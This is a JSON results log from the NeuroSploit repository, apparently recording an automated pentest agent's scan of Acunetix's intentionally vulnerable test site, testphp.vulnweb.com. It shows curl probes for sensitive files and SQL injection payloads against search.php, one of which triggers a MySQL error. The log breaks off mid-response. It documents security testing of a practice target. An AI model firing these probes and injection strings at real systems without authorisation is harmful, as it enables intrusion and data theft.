CalvinBackup/NeuroSploit
1
0
Fork 0
mirror of https://github.com/CyberSecurityUP/NeuroSploit.git synced 2026-02-12 14:02:45 +00:00
Code Issues Packages Projects Releases Wiki Activity
Files
d5899c19f46ddb25129e74051b4954a05933eac2
NeuroSploit/results/campaign_20260109_222914.json
Joas A Santos d5899c19f4 Add files via upload
2026-01-09 22:48:39 -03:00

1026 lines
187 KiB
JSON
Raw Blame History

{
"session_id": "20260109_222914",
"agent_role": "Pentestfull",
"input": "http://testphp.vulnweb.com/",
"timestamp": "2026-01-09T22:31:51.654859",
"results": {
"agent_name": "Pentestfull",
"input": "http://testphp.vulnweb.com/",
"targets": [
"http://testphp.vulnweb.com/"
],
"targets_count": 1,
"tools_executed": 125,
"vulnerabilities_found": 6,
"findings": [
{
"tool": "curl",
"args": "-s -k -L -D - \"http://testphp.vulnweb.com/\"",
"command": "/usr/bin/curl -s -k -L -D - \"http://testphp.vulnweb.com/\"",
"success": true,
"output": "HTTP/1.1 200 OK\nServer: nginx/1.19.0\nDate: Sat, 10 Jan 2026 01:29:14 GMT\nContent-Type: text/html; charset=UTF-8\nTransfer-Encoding: chunked\nConnection: keep-alive\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\n\n<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN\"\n\"http://www.w3.org/TR/html4/loose.dtd\">\n<html><!-- InstanceBegin template=\"/Templates/main_dynamic_template.dwt.php\" codeOutsideHTMLIsLocked=\"false\" -->\n<head>\n<meta http-equiv=\"Content-Type\" content=\"text/html; charset=iso-8859-2\">\n\n<!-- InstanceBeginEditable name=\"document_title_rgn\" -->\n<title>Home of Acunetix Art</title>\n<!-- InstanceEndEditable -->\n<link rel=\"stylesheet\" href=\"style.css\" type=\"text/css\">\n<!-- InstanceBeginEditable name=\"headers_rgn\" -->\n<!-- here goes headers headers -->\n<!-- InstanceEndEditable -->\n<script language=\"JavaScript\" type=\"text/JavaScript\">\n<!--\nfunction MM_reloadPage(init) { //reloads the window if Nav4 resized\n if (init==true) with (navigator) {if ((appName==\"Netscape\")&&(parseInt(appVersion)==4)) {\n document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}\n else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();\n}\nMM_reloadPage(true);\n//-->\n</script>\n\n</head>\n<body> \n<div id=\"mainLayer\" style=\"position:absolute; width:700px; z-index:1\">\n<div id=\"masthead\"> \n <h1 id=\"siteName\"><a href=\"https://www.acunetix.com/\"><img src=\"images/logo.gif\" width=\"306\" height=\"38\" border=\"0\" alt=\"Acunetix website security\"></a></h1> \n <h6 id=\"siteInfo\">TEST and Demonstration site for <a href=\"https://www.acunetix.com/vulnerability-scanner/\">Acunetix Web Vulnerability Scanner</a></h6>\n <div id=\"globalNav\"> \n \t<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\"><tr>\n\t<td align=\"left\">\n\t\t<a href=\"index.php\">home</a> | <a href=\"categories.php\">categories</a> | <a href=\"artists.php\">artists\n\t\t</a> | <a href=\"disclaimer.php\">disclaimer</a> | <a href=\"cart.php\">your cart</a> | \n\t\t<a href=\"guestbook.php\">guestbook</a> | \n\t\t<a href=\"AJAX/index.php\">AJAX Demo</a>\n\t</td>\n\t<td align=\"right\">\n\t\t</td>\n\t</tr></table>\n </div> \n</div> \n<!-- end masthead --> \n\n<!-- begin content -->\n<!-- InstanceBeginEditable name=\"content_rgn\" -->\n<div id=\"content\">\n\t<h2 id=\"pageName\">welcome to our page</h2>\n\t <div class=\"story\">\n\t\t<h3>Test site for Acunetix WVS.</h3>\n\t </div>\n</div>\n<!-- InstanceEndEditable -->\n<!--end content -->\n\n<div id=\"navBar\"> \n <div id=\"search\"> \n <form action=\"search.php?test=query\" method=\"post\"> \n <label>search art</label> \n <input name=\"searchFor\" type=\"text\" size=\"10\"> \n <input name=\"goButton\" type=\"submit\" value=\"go\"> \n </form> \n </div> \n <div id=\"sectionLinks\"> \n <ul> \n <li><a href=\"categories.php\">Browse categories</a></li> \n <li><a href=\"artists.php\">Browse artists</a></li> \n <li><a href=\"cart.php\">Your cart</a></li> \n <li><a href=\"login.php\">Signup</a></li>\n\t <li><a href=\"userinfo.php\">Your profile</a></li>\n\t <li><a href=\"guestbook.php\">Our guestbook</a></li>\n\t\t<li><a href=\"AJAX/index.php\">AJAX Demo</a></li>\n\t </li> \n </ul> \n </div> \n <div class=\"relatedLinks\"> \n <h3>Links</h3> \n <ul> \n <li><a href=\"http://www.acunetix.com\">Security art</a></li> \n\t <li><a href=\"https://www.acunetix.com/vulnerability-scanner/php-security-scanner/\">PHP scanner</a></li>\n\t <li><a href=\"https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/\">PHP vuln help</a></li>\n\t <li><a href=\"http://www.eclectasy.com/Fractal-Explorer/index.html\">Fractal Explorer</a></li> \n </ul> \n </div> \n <div id=\"advert\"> \n <p>\n <object classid=\"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\" codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0\" width=\"107\" height=\"66\">\n <param name=\"movie\" value=\"Flash/add.swf\">\n <param name=quality value=high>\n <embed src=\"Flash/add.swf\" quality=high pluginspage=\"http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash\" type=\"application/x-shockwave-flash\" width=\"107\" height=\"66\"></embed>\n </object>\n </p>\n </div> \n</div> \n\n<!--end navbar --> \n<div id=\"siteInfo\"> <a href=\"http://www.acunetix.com\">About Us</a> | <a href=\"privacy.php\">Privacy Policy</a> | <a href=\"mailto:wvs@acunetix.com\">Contact Us</a> | <a href=\"/Mod_Rewrite_Shop/\">Shop</a> | <a href=\"/hpp/\">HTTP Parameter Pollution</a> | &copy;2019\n Acunetix Ltd \n</div> \n \n \n<br> \n<div style=\"background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px\">\n<p style=\"padding-left:5%;padding-right:5%\"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p>\n</div>\n</div>\n</body>\n<!-- InstanceEnd --></html>\n",
"timestamp": "2026-01-09T22:29:14.144876"
},
{
"tool": "curl",
"args": "-s -k \"http://testphp.vulnweb.com/\"",
"command": "/usr/bin/curl -s -k \"http://testphp.vulnweb.com/\"",
"success": true,
"output": "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN\"\n\"http://www.w3.org/TR/html4/loose.dtd\">\n<html><!-- InstanceBegin template=\"/Templates/main_dynamic_template.dwt.php\" codeOutsideHTMLIsLocked=\"false\" -->\n<head>\n<meta http-equiv=\"Content-Type\" content=\"text/html; charset=iso-8859-2\">\n\n<!-- InstanceBeginEditable name=\"document_title_rgn\" -->\n<title>Home of Acunetix Art</title>\n<!-- InstanceEndEditable -->\n<link rel=\"stylesheet\" href=\"style.css\" type=\"text/css\">\n<!-- InstanceBeginEditable name=\"headers_rgn\" -->\n<!-- here goes headers headers -->\n<!-- InstanceEndEditable -->\n<script language=\"JavaScript\" type=\"text/JavaScript\">\n<!--\nfunction MM_reloadPage(init) { //reloads the window if Nav4 resized\n if (init==true) with (navigator) {if ((appName==\"Netscape\")&&(parseInt(appVersion)==4)) {\n document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}\n else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();\n}\nMM_reloadPage(true);\n//-->\n</script>\n\n</head>\n<body> \n<div id=\"mainLayer\" style=\"position:absolute; width:700px; z-index:1\">\n<div id=\"masthead\"> \n <h1 id=\"siteName\"><a href=\"https://www.acunetix.com/\"><img src=\"images/logo.gif\" width=\"306\" height=\"38\" border=\"0\" alt=\"Acunetix website security\"></a></h1> \n <h6 id=\"siteInfo\">TEST and Demonstration site for <a href=\"https://www.acunetix.com/vulnerability-scanner/\">Acunetix Web Vulnerability Scanner</a></h6>\n <div id=\"globalNav\"> \n \t<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\"><tr>\n\t<td align=\"left\">\n\t\t<a href=\"index.php\">home</a> | <a href=\"categories.php\">categories</a> | <a href=\"artists.php\">artists\n\t\t</a> | <a href=\"disclaimer.php\">disclaimer</a> | <a href=\"cart.php\">your cart</a> | \n\t\t<a href=\"guestbook.php\">guestbook</a> | \n\t\t<a href=\"AJAX/index.php\">AJAX Demo</a>\n\t</td>\n\t<td align=\"right\">\n\t\t</td>\n\t</tr></table>\n </div> \n</div> \n<!-- end masthead --> \n\n<!-- begin content -->\n<!-- InstanceBeginEditable name=\"content_rgn\" -->\n<div id=\"content\">\n\t<h2 id=\"pageName\">welcome to our page</h2>\n\t <div class=\"story\">\n\t\t<h3>Test site for Acunetix WVS.</h3>\n\t </div>\n</div>\n<!-- InstanceEndEditable -->\n<!--end content -->\n\n<div id=\"navBar\"> \n <div id=\"search\"> \n <form action=\"search.php?test=query\" method=\"post\"> \n <label>search art</label> \n <input name=\"searchFor\" type=\"text\" size=\"10\"> \n <input name=\"goButton\" type=\"submit\" value=\"go\"> \n </form> \n </div> \n <div id=\"sectionLinks\"> \n <ul> \n <li><a href=\"categories.php\">Browse categories</a></li> \n <li><a href=\"artists.php\">Browse artists</a></li> \n <li><a href=\"cart.php\">Your cart</a></li> \n <li><a href=\"login.php\">Signup</a></li>\n\t <li><a href=\"userinfo.php\">Your profile</a></li>\n\t <li><a href=\"guestbook.php\">Our guestbook</a></li>\n\t\t<li><a href=\"AJAX/index.php\">AJAX Demo</a></li>\n\t </li> \n </ul> \n </div> \n <div class=\"relatedLinks\"> \n <h3>Links</h3> \n <ul> \n <li><a href=\"http://www.acunetix.com\">Security art</a></li> \n\t <li><a href=\"https://www.acunetix.com/vulnerability-scanner/php-security-scanner/\">PHP scanner</a></li>\n\t <li><a href=\"https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/\">PHP vuln help</a></li>\n\t <li><a href=\"http://www.eclectasy.com/Fractal-Explorer/index.html\">Fractal Explorer</a></li> \n </ul> \n </div> \n <div id=\"advert\"> \n <p>\n <object classid=\"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\" codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0\" width=\"107\" height=\"66\">\n <param name=\"movie\" value=\"Flash/add.swf\">\n <param name=quality value=high>\n <embed src=\"Flash/add.swf\" quality=high pluginspage=\"http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash\" type=\"application/x-shockwave-flash\" width=\"107\" height=\"66\"></embed>\n </object>\n </p>\n </div> \n</div> \n\n<!--end navbar --> \n<div id=\"siteInfo\"> <a href=\"http://www.acunetix.com\">About Us</a> | <a href=\"privacy.php\">Privacy Policy</a> | <a href=\"mailto:wvs@acunetix.com\">Contact Us</a> | <a href=\"/Mod_Rewrite_Shop/\">Shop</a> | <a href=\"/hpp/\">HTTP Parameter Pollution</a> | &copy;2019\n Acunetix Ltd \n</div> \n \n \n<br> \n<div style=\"background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px\">\n<p style=\"padding-left:5%;padding-right:5%\"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p>\n</div>\n</div>\n</body>\n<!-- InstanceEnd --></html>\n",
"timestamp": "2026-01-09T22:29:14.594435"
},
{
"tool": "curl",
"args": "-s -k -o /dev/null -w \"%{http_code}\" \"http://testphp.vulnweb.com//robots.txt\"",
"command": "/usr/bin/curl -s -k -o /dev/null -w \"%{http_code}\" \"http://testphp.vulnweb.com//robots.txt\"",
"success": true,
"output": "404",
"timestamp": "2026-01-09T22:29:15.031988"
},
{
"tool": "curl",
"args": "-s -k -o /dev/null -w \"%{http_code}\" \"http://testphp.vulnweb.com//sitemap.xml\"",
"command": "/usr/bin/curl -s -k -o /dev/null -w \"%{http_code}\" \"http://testphp.vulnweb.com//sitemap.xml\"",
"success": true,
"output": "404",
"timestamp": "2026-01-09T22:29:15.473237"
},
{
"tool": "curl",
"args": "-s -k -o /dev/null -w \"%{http_code}\" \"http://testphp.vulnweb.com//.htaccess\"",
"command": "/usr/bin/curl -s -k -o /dev/null -w \"%{http_code}\" \"http://testphp.vulnweb.com//.htaccess\"",
"success": true,
"output": "404",
"timestamp": "2026-01-09T22:29:15.914870"
},
{
"tool": "curl",
"args": "-s -k -o /dev/null -w \"%{http_code}\" \"http://testphp.vulnweb.com//crossdomain.xml\"",
"command": "/usr/bin/curl -s -k -o /dev/null -w \"%{http_code}\" \"http://testphp.vulnweb.com//crossdomain.xml\"",
"success": true,
"output": "200",
"timestamp": "2026-01-09T22:29:16.360645"
},
{
"tool": "curl",
"args": "-s -k -o /dev/null -w \"%{http_code}\" \"http://testphp.vulnweb.com//phpinfo.php\"",
"command": "/usr/bin/curl -s -k -o /dev/null -w \"%{http_code}\" \"http://testphp.vulnweb.com//phpinfo.php\"",
"success": true,
"output": "404",
"timestamp": "2026-01-09T22:29:16.806101"
},
{
"tool": "curl",
"args": "-s -k -o /dev/null -w \"%{http_code}\" \"http://testphp.vulnweb.com//info.php\"",
"command": "/usr/bin/curl -s -k -o /dev/null -w \"%{http_code}\" \"http://testphp.vulnweb.com//info.php\"",
"success": true,
"output": "404",
"timestamp": "2026-01-09T22:29:17.236553"
},
{
"tool": "curl",
"args": "-s -k -o /dev/null -w \"%{http_code}\" \"http://testphp.vulnweb.com//test.php\"",
"command": "/usr/bin/curl -s -k -o /dev/null -w \"%{http_code}\" \"http://testphp.vulnweb.com//test.php\"",
"success": true,
"output": "404",
"timestamp": "2026-01-09T22:29:17.756413"
},
{
"tool": "curl",
"args": "-s -k -o /dev/null -w \"%{http_code}\" \"http://testphp.vulnweb.com//admin/\"",
"command": "/usr/bin/curl -s -k -o /dev/null -w \"%{http_code}\" \"http://testphp.vulnweb.com//admin/\"",
"success": true,
"output": "200",
"timestamp": "2026-01-09T22:29:18.192241"
},
{
"tool": "curl",
"args": "-s -k \"http://testphp.vulnweb.com/search.php?test=1'\"",
"command": "/usr/bin/curl -s -k \"http://testphp.vulnweb.com/search.php?test=1'\"",
"success": true,
"output": "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN\"\n\"http://www.w3.org/TR/html4/loose.dtd\">\n<html><!-- InstanceBegin template=\"/Templates/main_dynamic_template.dwt.php\" codeOutsideHTMLIsLocked=\"false\" -->\n<head>\n<meta http-equiv=\"Content-Type\" content=\"text/html; charset=iso-8859-2\">\n\n<!-- InstanceBeginEditable name=\"document_title_rgn\" -->\n<title>search</title>\n<!-- InstanceEndEditable -->\n<link rel=\"stylesheet\" href=\"style.css\" type=\"text/css\">\n<!-- InstanceBeginEditable name=\"headers_rgn\" -->\n<!-- here goes headers headers -->\n<!-- InstanceEndEditable -->\n<script language=\"JavaScript\" type=\"text/JavaScript\">\n<!--\nfunction MM_reloadPage(init) { //reloads the window if Nav4 resized\n if (init==true) with (navigator) {if ((appName==\"Netscape\")&&(parseInt(appVersion)==4)) {\n document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}\n else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();\n}\nMM_reloadPage(true);\n//-->\n</script>\n\n</head>\n<body> \n<div id=\"mainLayer\" style=\"position:absolute; width:700px; z-index:1\">\n<div id=\"masthead\"> \n <h1 id=\"siteName\"><a href=\"https://www.acunetix.com/\"><img src=\"images/logo.gif\" width=\"306\" height=\"38\" border=\"0\" alt=\"Acunetix website security\"></a></h1> \n <h6 id=\"siteInfo\">TEST and Demonstration site for <a href=\"https://www.acunetix.com/vulnerability-scanner/\">Acunetix Web Vulnerability Scanner</a></h6>\n <div id=\"globalNav\"> \n \t<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\"><tr>\n\t<td align=\"left\">\n\t\t<a href=\"index.php\">home</a> | <a href=\"categories.php\">categories</a> | <a href=\"artists.php\">artists\n\t\t</a> | <a href=\"disclaimer.php\">disclaimer</a> | <a href=\"cart.php\">your cart</a> | \n\t\t<a href=\"guestbook.php\">guestbook</a> | \n\t\t<a href=\"AJAX/index.php\">AJAX Demo</a>\n\t</td>\n\t<td align=\"right\">\n\t\t</td>\n\t</tr></table>\n </div> \n</div> \n<!-- end masthead --> \n\n<!-- begin content -->\n<!-- InstanceBeginEditable name=\"content_rgn\" -->\n<div id=\"content\">\n\tError: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1",
"timestamp": "2026-01-09T22:29:38.901859"
},
{
"tool": "curl",
"args": "-s -k \"http://testphp.vulnweb.com/search.php?test=1%22\"",
"command": "/usr/bin/curl -s -k \"http://testphp.vulnweb.com/search.php?test=1%22\"",
"success": true,
"output": "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN\"\n\"http://www.w3.org/TR/html4/loose.dtd\">\n<html><!-- InstanceBegin template=\"/Templates/main_dynamic_template.dwt.php\" codeOutsideHTMLIsLocked=\"false\" -->\n<head>\n<meta http-equiv=\"Content-Type\" content=\"text/html; charset=iso-8859-2\">\n\n<!-- InstanceBeginEditable name=\"document_title_rgn\" -->\n<title>search</title>\n<!-- InstanceEndEditable -->\n<link rel=\"stylesheet\" href=\"style.css\" type=\"text/css\">\n<!-- InstanceBeginEditable name=\"headers_rgn\" -->\n<!-- here goes headers headers -->\n<!-- InstanceEndEditable -->\n<script language=\"JavaScript\" type=\"text/JavaScript\">\n<!--\nfunction MM_reloadPage(init) { //reloads the window if Nav4 resized\n if (init==true) with (navigator) {if ((appName==\"Netscape\")&&(parseInt(appVersion)==4)) {\n document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}\n else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();\n}\nMM_reloadPage(true);\n//-->\n</script>\n\n</head>\n<body> \n<div id=\"mainLayer\" style=\"position:absolute; width:700px; z-index:1\">\n<div id=\"masthead\"> \n <h1 id=\"siteName\"><a href=\"https://www.acunetix.com/\"><img src=\"images/logo.gif\" width=\"306\" height=\"38\" border=\"0\" alt=\"Acunetix website security\"></a></h1> \n <h6 id=\"siteInfo\">TEST and Demonstration site for <a href=\"https://www.acunetix.com/vulnerability-scanner/\">Acunetix Web Vulnerability Scanner</a></h6>\n <div id=\"globalNav\"> \n \t<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\"><tr>\n\t<td align=\"left\">\n\t\t<a href=\"index.php\">home</a> | <a href=\"categories.php\">categories</a> | <a href=\"artists.php\">artists\n\t\t</a> | <a href=\"disclaimer.php\">disclaimer</a> | <a href=\"cart.php\">your cart</a> | \n\t\t<a href=\"guestbook.php\">guestbook</a> | \n\t\t<a href=\"AJAX/index.php\">AJAX Demo</a>\n\t</td>\n\t<td align=\"right\">\n\t\t</td>\n\t</tr></table>\n </div> \n</div> \n<!-- end masthead --> \n\n<!-- begin content -->\n<!-- InstanceBeginEditable name=\"content_rgn\" -->\n<div id=\"content\">\n\t</div>\n<!-- InstanceEndEditable -->\n<!--end content -->\n\n<div id=\"navBar\"> \n <div id=\"search\"> \n <form action=\"search.php?test=query\" method=\"post\"> \n <label>search art</label> \n <input name=\"searchFor\" type=\"text\" size=\"10\"> \n <input name=\"goButton\" type=\"submit\" value=\"go\"> \n </form> \n </div> \n <div id=\"sectionLinks\"> \n <ul> \n <li><a href=\"categories.php\">Browse categories</a></li> \n <li><a href=\"artists.php\">Browse artists</a></li> \n <li><a href=\"cart.php\">Your cart</a></li> \n <li><a href=\"login.php\">Signup</a></li>\n\t <li><a href=\"userinfo.php\">Your profile</a></li>\n\t <li><a href=\"guestbook.php\">Our guestbook</a></li>\n\t\t<li><a href=\"AJAX/index.php\">AJAX Demo</a></li>\n\t </li> \n </ul> \n </div> \n <div class=\"relatedLinks\"> \n <h3>Links</h3> \n <ul> \n <li><a href=\"http://www.acunetix.com\">Security art</a></li> \n\t <li><a href=\"https://www.acunetix.com/vulnerability-scanner/php-security-scanner/\">PHP scanner</a></li>\n\t <li><a href=\"https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/\">PHP vuln help</a></li>\n\t <li><a href=\"http://www.eclectasy.com/Fractal-Explorer/index.html\">Fractal Explorer</a></li> \n </ul> \n </div> \n <div id=\"advert\"> \n <p>\n <object classid=\"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\" codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0\" width=\"107\" height=\"66\">\n <param name=\"movie\" value=\"Flash/add.swf\">\n <param name=quality value=high>\n <embed src=\"Flash/add.swf\" quality=high pluginspage=\"http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash\" type=\"application/x-shockwave-flash\" width=\"107\" height=\"66\"></embed>\n </object>\n </p>\n </div> \n</div> \n\n<!--end navbar --> \n<div id=\"siteInfo\"> <a href=\"http://www.acunetix.com\">About Us</a> | <a href=\"privacy.php\">Privacy Policy</a> | <a href=\"mailto:wvs@acunetix.com\">Contact Us</a> | &copy;2019\n Acunetix Ltd \n</div> \n<br> \n<div style=\"background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px\">\n<p style=\"padding-left:5%;padding-right:5%\"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p>\n</div>\n</div>\n</body>\n<!-- InstanceEnd --></html>\n",
"timestamp": "2026-01-09T22:29:39.346161"
},
{
"tool": "curl",
"args": "-s -k \"http://testphp.vulnweb.com/search.php?test=1%20OR%201=1\"",
"command": "/usr/bin/curl -s -k \"http://testphp.vulnweb.com/search.php?test=1%20OR%201=1\"",
"success": true,
"output": "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN\"\n\"http://www.w3.org/TR/html4/loose.dtd\">\n<html><!-- InstanceBegin template=\"/Templates/main_dynamic_template.dwt.php\" codeOutsideHTMLIsLocked=\"false\" -->\n<head>\n<meta http-equiv=\"Content-Type\" content=\"text/html; charset=iso-8859-2\">\n\n<!-- InstanceBeginEditable name=\"document_title_rgn\" -->\n<title>search</title>\n<!-- InstanceEndEditable -->\n<link rel=\"stylesheet\" href=\"style.css\" type=\"text/css\">\n<!-- InstanceBeginEditable name=\"headers_rgn\" -->\n<!-- here goes headers headers -->\n<!-- InstanceEndEditable -->\n<script language=\"JavaScript\" type=\"text/JavaScript\">\n<!--\nfunction MM_reloadPage(init) { //reloads the window if Nav4 resized\n if (init==true) with (navigator) {if ((appName==\"Netscape\")&&(parseInt(appVersion)==4)) {\n document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}\n else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();\n}\nMM_reloadPage(true);\n//-->\n</script>\n\n</head>\n<body> \n<div id=\"mainLayer\" style=\"position:absolute; width:700px; z-index:1\">\n<div id=\"masthead\"> \n <h1 id=\"siteName\"><a href=\"https://www.acunetix.com/\"><img src=\"images/logo.gif\" width=\"306\" height=\"38\" border=\"0\" alt=\"Acunetix website security\"></a></h1> \n <h6 id=\"siteInfo\">TEST and Demonstration site for <a href=\"https://www.acunetix.com/vulnerability-scanner/\">Acunetix Web Vulnerability Scanner</a></h6>\n <div id=\"globalNav\"> \n \t<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\"><tr>\n\t<td align=\"left\">\n\t\t<a href=\"index.php\">home</a> | <a href=\"categories.php\">categories</a> | <a href=\"artists.php\">artists\n\t\t</a> | <a href=\"disclaimer.php\">disclaimer</a> | <a href=\"cart.php\">your cart</a> | \n\t\t<a href=\"guestbook.php\">guestbook</a> | \n\t\t<a href=\"AJAX/index.php\">AJAX Demo</a>\n\t</td>\n\t<td align=\"right\">\n\t\t</td>\n\t</tr></table>\n </div> \n</div> \n<!-- end masthead --> \n\n<!-- begin content -->\n<!-- InstanceBeginEditable name=\"content_rgn\" -->\n<div id=\"content\">\n\t</div>\n<!-- InstanceEndEditable -->\n<!--end content -->\n\n<div id=\"navBar\"> \n <div id=\"search\"> \n <form action=\"search.php?test=query\" method=\"post\"> \n <label>search art</label> \n <input name=\"searchFor\" type=\"text\" size=\"10\"> \n <input name=\"goButton\" type=\"submit\" value=\"go\"> \n </form> \n </div> \n <div id=\"sectionLinks\"> \n <ul> \n <li><a href=\"categories.php\">Browse categories</a></li> \n <li><a href=\"artists.php\">Browse artists</a></li> \n <li><a href=\"cart.php\">Your cart</a></li> \n <li><a href=\"login.php\">Signup</a></li>\n\t <li><a href=\"userinfo.php\">Your profile</a></li>\n\t <li><a href=\"guestbook.php\">Our guestbook</a></li>\n\t\t<li><a href=\"AJAX/index.php\">AJAX Demo</a></li>\n\t </li> \n </ul> \n </div> \n <div class=\"relatedLinks\"> \n <h3>Links</h3> \n <ul> \n <li><a href=\"http://www.acunetix.com\">Security art</a></li> \n\t <li><a href=\"https://www.acunetix.com/vulnerability-scanner/php-security-scanner/\">PHP scanner</a></li>\n\t <li><a href=\"https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/\">PHP vuln help</a></li>\n\t <li><a href=\"http://www.eclectasy.com/Fractal-Explorer/index.html\">Fractal Explorer</a></li> \n </ul> \n </div> \n <div id=\"advert\"> \n <p>\n <object classid=\"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\" codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0\" width=\"107\" height=\"66\">\n <param name=\"movie\" value=\"Flash/add.swf\">\n <param name=quality value=high>\n <embed src=\"Flash/add.swf\" quality=high pluginspage=\"http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash\" type=\"application/x-shockwave-flash\" width=\"107\" height=\"66\"></embed>\n </object>\n </p>\n </div> \n</div> \n\n<!--end navbar --> \n<div id=\"siteInfo\"> <a href=\"http://www.acunetix.com\">About Us</a> | <a href=\"privacy.php\">Privacy Policy</a> | <a href=\"mailto:wvs@acunetix.com\">Contact Us</a> | &copy;2019\n Acunetix Ltd \n</div> \n<br> \n<div style=\"background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px\">\n<p style=\"padding-left:5%;padding-right:5%\"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p>\n</div>\n</div>\n</body>\n<!-- InstanceEnd --></html>\n",
"timestamp": "2026-01-09T22:29:39.784811"
},
{
"tool": "curl",
"args": "-s -k \"http://testphp.vulnweb.com/search.php?test=1%27%20OR%20%271%27=%271\"",
"command": "/usr/bin/curl -s -k \"http://testphp.vulnweb.com/search.php?test=1%27%20OR%20%271%27=%271\"",
"success": true,
"output": "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN\"\n\"http://www.w3.org/TR/html4/loose.dtd\">\n<html><!-- InstanceBegin template=\"/Templates/main_dynamic_template.dwt.php\" codeOutsideHTMLIsLocked=\"false\" -->\n<head>\n<meta http-equiv=\"Content-Type\" content=\"text/html; charset=iso-8859-2\">\n\n<!-- InstanceBeginEditable name=\"document_title_rgn\" -->\n<title>search</title>\n<!-- InstanceEndEditable -->\n<link rel=\"stylesheet\" href=\"style.css\" type=\"text/css\">\n<!-- InstanceBeginEditable name=\"headers_rgn\" -->\n<!-- here goes headers headers -->\n<!-- InstanceEndEditable -->\n<script language=\"JavaScript\" type=\"text/JavaScript\">\n<!--\nfunction MM_reloadPage(init) { //reloads the window if Nav4 resized\n if (init==true) with (navigator) {if ((appName==\"Netscape\")&&(parseInt(appVersion)==4)) {\n document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}\n else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();\n}\nMM_reloadPage(true);\n//-->\n</script>\n\n</head>\n<body> \n<div id=\"mainLayer\" style=\"position:absolute; width:700px; z-index:1\">\n<div id=\"masthead\"> \n <h1 id=\"siteName\"><a href=\"https://www.acunetix.com/\"><img src=\"images/logo.gif\" width=\"306\" height=\"38\" border=\"0\" alt=\"Acunetix website security\"></a></h1> \n <h6 id=\"siteInfo\">TEST and Demonstration site for <a href=\"https://www.acunetix.com/vulnerability-scanner/\">Acunetix Web Vulnerability Scanner</a></h6>\n <div id=\"globalNav\"> \n \t<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\"><tr>\n\t<td align=\"left\">\n\t\t<a href=\"index.php\">home</a> | <a href=\"categories.php\">categories</a> | <a 